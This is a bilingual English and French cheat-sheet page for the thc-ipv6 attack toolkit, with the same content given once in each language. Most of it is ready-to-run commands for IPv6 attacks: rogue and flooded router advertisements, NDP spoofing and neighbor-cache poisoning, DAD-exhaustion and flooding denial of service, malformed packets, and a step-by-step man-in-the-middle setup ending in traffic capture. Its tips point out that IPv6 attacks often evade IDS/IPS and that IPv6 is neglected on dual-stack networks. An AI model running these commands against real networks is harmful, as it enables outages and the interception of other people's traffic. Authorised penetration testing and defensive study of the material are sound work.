thc-ipv6

Boîte à outils d'attaque IPv6. Suite complète pour les attaques réseau IPv6 : usurpation de neighbor discovery, flood de router advertisement, attaques DoS, MITM et exploitation d'infrastructure IPv6. IPv6 attack toolkit. Comprehensive suite for IPv6 network attacks — neighbor discovery spoofing, router advertisement flooding, DoS attacks, MITM, and IPv6 infrastructure exploitation.

↗ https://github.com/vanhauser-thc/thc-ipv6

Overview

THC-IPv6 is a complete toolkit for attacking IPv6 networks. It exploits IPv6 protocol weaknesses including Neighbor Discovery Protocol (NDP) attacks, Router Advertisement (RA) flooding, Duplicate Address Detection (DAD) DoS, and various MITM techniques specific to IPv6.

Installation

sudo apt install thc-ipv6

Host Discovery

Discover IPv6 hosts on local network

alive6 eth0

Discover with verbose

alive6 -v eth0

Send multicast pings to find hosts

detect-new-ip6 eth0

Scan a specific IPv6 prefix

alive6 eth0 2001:db8::/64

Router Advertisement Flooding

Flood with fake router advertisements (causes MITM)

flood_router6 eth0

Rogue RA (become default router)

rogue_router6 eth0

Flood RS/RA to cause DoS

flood_router26 eth0

Neighbor Discovery Attacks

NDP spoofing (like ARP spoofing for IPv6)

parasite6 eth0

Flood NDP neighbor solicitations

flood_solicitate6 eth0 2001:db8::1

Neighbor cache poisoning

ndpexhaust6 eth0 victim6

DoS Attacks

Exhaust DAD process (prevent address assignment)

dos-new-ip6 eth0

Flood router with discovery requests

flood_rs6 eth0

Send malformed packets

exploit6 eth0 TARGET_IPV6 TYPE

MITM with IPv6

Step 1: Fake RA to become router

fake_router6 eth0 2001:db8::/64

Step 2: Enable IPv6 forwarding

sysctl -w net.ipv6.conf.all.forwarding=1
# Step 3: Traffic now routes through you
# Use wireshark/tcpdump to capture

Address Scanning

ping6 -I eth0 ff02::1    # All nodes
ping6 -I eth0 ff02::2    # All routers

Scan discovered hosts

nmap -6 -sV 2001:db8::1

Tips

  • IPv6 attacks are often undetected — most IDS/IPS don’t inspect IPv6 as thoroughly
  • RA flooding is devastating in IPv6 networks — clients accept RA from any router by default
  • parasite6 is the IPv6 equivalent of arpspoof — intercepts neighbor cache
  • Many networks have IPv6 enabled but unmanaged — a fertile attack surface
  • Use in dual-stack environments where IPv4 is protected but IPv6 is overlooked
Help / Man page
THC-IPv6 tools:
  alive6           — discover IPv6 hosts
  fake_router6     — fake router advertisement
  flood_router6    — RA flooding DoS
  parasite6        — NDP cache poisoning (MITM)
  dos-new-ip6      — DAD exhaustion
  flood_solicitate6 — NDP flood
  rogue_router6    — rogue router
  detect-new-ip6   — detect new hosts

All tools: IFACE [options] [target]

Vue d’ensemble

THC-IPv6 est une boîte à outils complète pour attaquer les réseaux IPv6. Elle exploite les faiblesses du protocole IPv6, notamment les attaques Neighbor Discovery Protocol (NDP), le flood de Router Advertisement (RA), le DoS par Duplicate Address Detection (DAD), et diverses techniques de MITM spécifiques à IPv6.

Installation

sudo apt install thc-ipv6

Découverte d’hôtes

# Découvrir les hôtes IPv6 sur le réseau local
alive6 eth0

# Découverte en mode verbeux
alive6 -v eth0

# Envoyer des pings multicast pour trouver des hôtes
detect-new-ip6 eth0

# Scanner un préfixe IPv6 spécifique
alive6 eth0 2001:db8::/64

Flood de Router Advertisement

# Flooder avec de fausses annonces de routeur (provoque un MITM)
flood_router6 eth0

# RA malveillant (devenir le routeur par défaut)
rogue_router6 eth0

# Flooder RS/RA pour provoquer un DoS
flood_router26 eth0

Attaques Neighbor Discovery

# Usurpation NDP (équivalent de l'ARP spoofing pour IPv6)
parasite6 eth0

# Flood de sollicitations neighbor NDP
flood_solicitate6 eth0 2001:db8::1

# Empoisonnement du cache de voisins
ndpexhaust6 eth0 victim6

Attaques DoS

# Épuiser le processus DAD (empêcher l'attribution d'adresses)
dos-new-ip6 eth0

# Flooder le routeur avec des requêtes de découverte
flood_rs6 eth0

# Envoyer des paquets malformés
exploit6 eth0 TARGET_IPV6 TYPE

MITM avec IPv6

# Étape 1 : faux RA pour devenir le routeur
fake_router6 eth0 2001:db8::/64

# Étape 2 : activer le forwarding IPv6
sysctl -w net.ipv6.conf.all.forwarding=1

# Étape 3 : le trafic transite maintenant par vous
# Utiliser wireshark/tcpdump pour capturer

Scan d’adresses

ping6 -I eth0 ff02::1    # Tous les nœuds

ping6 -I eth0 ff02::2    # Tous les routeurs

# Scanner les hôtes découverts
nmap -6 -sV 2001:db8::1

Conseils

  • Les attaques IPv6 passent souvent inaperçues : la plupart des IDS/IPS n’inspectent pas IPv6 aussi minutieusement
  • Le flood RA est dévastateur sur les réseaux IPv6 : les clients acceptent par défaut les RA de n’importe quel routeur
  • parasite6 est l’équivalent IPv6 d’arpspoof : il intercepte le cache de voisins
  • Beaucoup de réseaux ont IPv6 activé mais non géré : une surface d’attaque fertile
  • À utiliser sur des environnements dual-stack où IPv4 est protégé mais IPv6 est négligé
Aide / Page de manuel
THC-IPv6 tools:
  alive6           — discover IPv6 hosts
  fake_router6     — fake router advertisement
  flood_router6    — RA flooding DoS
  parasite6        — NDP cache poisoning (MITM)
  dos-new-ip6      — DAD exhaustion
  flood_solicitate6 — NDP flood
  rogue_router6    — rogue router
  detect-new-ip6   — detect new hosts

All tools: IFACE [options] [target]